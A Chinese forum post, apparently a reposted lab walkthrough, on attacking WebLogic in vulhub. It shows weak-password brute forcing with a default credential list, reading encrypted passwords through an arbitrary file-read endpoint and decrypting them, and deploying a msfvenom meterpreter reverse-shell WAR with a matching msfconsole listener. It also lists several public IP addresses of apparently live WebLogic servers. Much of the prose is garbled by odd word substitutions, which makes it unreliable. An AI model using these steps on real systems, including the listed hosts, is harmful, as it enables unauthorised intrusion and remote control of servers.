小秦哥 发表于 2024-11-2 11:56:18

WebLogic:弱口令,木马反弹连接

weblogic

WebLogic 是 Oracle 公司开辟的应用服务器,主要用作开辟、集成、摆设和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全弊端,其中包括弱口令、恣意文件上传、SSRF、反序列化弊端等
常见版本:

   WebLogic Server 10.x http://94.101.140.201:7001/    WebLogic Server 11.x  http://64.44.157.94:7001/    较为少见 12 和 8 版本    12:http://124.128.249.189:7001/    8:http://129.126.221.67:7001/默认服务端口:7001


vulhub靶场使用

vulhub:多个靶场的集合
1.关闭防火墙

   systemctl stop firewalld.service 
2.关闭selinux系统防护[具体见主页]

   setenforce 0
3.开启docker服务

   systemctl restart docker.service 
4.进入vulhub靶场目次

   cd /var/local/vulhub-master/weblogic/weak_password
5.开启靶场[背景开启]

   docker-compose up -d
6.查看靶场信息

# docker ps
CONTAINER ID   IMAGE                           COMMAND            CREATED          STATUS          PORTS                                                                                  NAMES
5ebeb02ea02a   vulhub/weblogic:10.3.6.0-2017   "startWebLogic.sh"   54 minutes ago   Up 54 seconds   0.0.0.0:5556->5556/tcp, :::5556->5556/tcp, 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp   weak_password_weblogic_ 7.访问靶场 

http://192.168.10.5:7001/
https://i-blog.csdnimg.cn/direct/1e1471ca5d1046b386468abe4a88eb3a.png
8.关闭靶场[切换至靶场目次下]

 docker-compose stop
# docker-compose stop
Stopping weak_password_weblogic_1 ... done
9.切换靶场 [报错重复步调1~3]

# cd ..
# ls
CVE-2017-10271CVE-2018-2628CVE-2018-2894CVE-2020-14882CVE-2023-21839ssrfweak_password
# cd ssrf/
# docker-compose up -d
Starting ssrf_redis_1 ... done
Starting ssrf_weblogic_1 ... done
#

弱口令爆破

weblogic弱口令:
用户名密码systempasswordweblogicweblogicadminsecruityjoepasswordmarypasswordsystemsercuritywlcsystemwlcsystemweblogicOracle@123 1.抓取数据包

https://i-blog.csdnimg.cn/direct/7f0adcd198354ee6952622ecff0d63e5.png
2.发送攻击者模块,攻击模式:pitchfork

https://i-blog.csdnimg.cn/direct/f86c934ce6a041ef9d99a79ccfbdc30b.png
3.标志载荷,导入弱口令


 https://i-blog.csdnimg.cn/direct/53786fd665254aae909dc5c3e0952537.png
https://i-blog.csdnimg.cn/direct/b7e82c6f792b48bd90e7a2b720550440.png
4.开始爆破

https://i-blog.csdnimg.cn/direct/49644c7d03f142e4a28ca3fb0191c14f.png
 5.拿到用户信息并登录

https://i-blog.csdnimg.cn/direct/9c81cad196b446e681d34ef58e9ee7f8.png
恣意文件读取[应用步伐弊端读取weblogic密码] 

通过弊端读取weblogic密钥及密文,使用AES解密出背景密码
密文绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/security/Se
rializedSystemIni.dat
密钥绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/config/con
fig.xml 弊端接口路径:
http://192.168.10.5:7001/hello/file.jsp?path=/etc/passwd https://i-blog.csdnimg.cn/direct/8f42ba1008304510bba3b7720a2535ae.png
使用bp获取密文并解密

1.抓取接口数据包

2.改为密码密文路径,获取响应

        请求:https://i-blog.csdnimg.cn/direct/e4571591b43c4d4295229d9f8e64bc80.png
        响应:
https://i-blog.csdnimg.cn/direct/48c3415063c546289146f5e9596f841c.png
3.响应视图修改为 Hex ,选中乱码部门的16进制数据,右键https://i-blog.csdnimg.cn/direct/9d2981c3c0d64673a4a800e9c66e645f.png生存为.dat文件

https://i-blog.csdnimg.cn/direct/6348e35e5dde419baaef08a0b5934b80.png
 https://i-blog.csdnimg.cn/direct/8e3cf23784b44704830629e79bd1e47e.png
4.读取配置文件,生存密钥

config.xml是base_domain的全局配置文件
其中<node-manager-password-encrypted>标签的值为"密钥"
https://i-blog.csdnimg.cn/direct/82201ed12df14069ac3c848d88c222a0.png
5.下载解密工具,进行解密

地址:https://github.com/TideSec/Decrypt_Weblogic_Password
工具路径:Decrypt_Weblogic_Password-master\Tools5-weblogic_decrypt https://i-blog.csdnimg.cn/direct/77419f2fe46c405e9f455cceb66511d2.png
扩展:使用.bat脚本快速启动工具

创建.bat文件将其生存至工具目次
@echo off
echo Starting the weblogic_decrypt.jar application...
java -jar weblogic_decrypt.jar
echo Application has ended. Press any key to exit.
pause > nul

建立反弹连接

1.kali使用msf生成木马

msfvenom -p java/meterpreter/reverse_tcp lhost=攻击者ip lport=4444 -f war -o java.war https://i-blog.csdnimg.cn/direct/3c776c7f55b34f6db21472233cc1f92f.png
2.将木马摆设入服务器

点击左侧 部署->安装->上载文件->上传war包->(全部下一步)-> 完成 https://i-blog.csdnimg.cn/direct/36002045413c48aeb8a21bb3f91dd076.png
 https://i-blog.csdnimg.cn/direct/dfac34aa89e44606915013ad44098e13.png
3.监听连接端口

msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.10.128
set LPORT 4444
exploit  https://i-blog.csdnimg.cn/direct/b24a2c7a19574de48c9231b12210fddd.png
4.访问木马路径,建立连接

http://192.168.10.5:7001/java https://i-blog.csdnimg.cn/direct/cb802f454f3540048709ea929e7ca9ec.png




免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: WebLogic:弱口令,木马反弹连接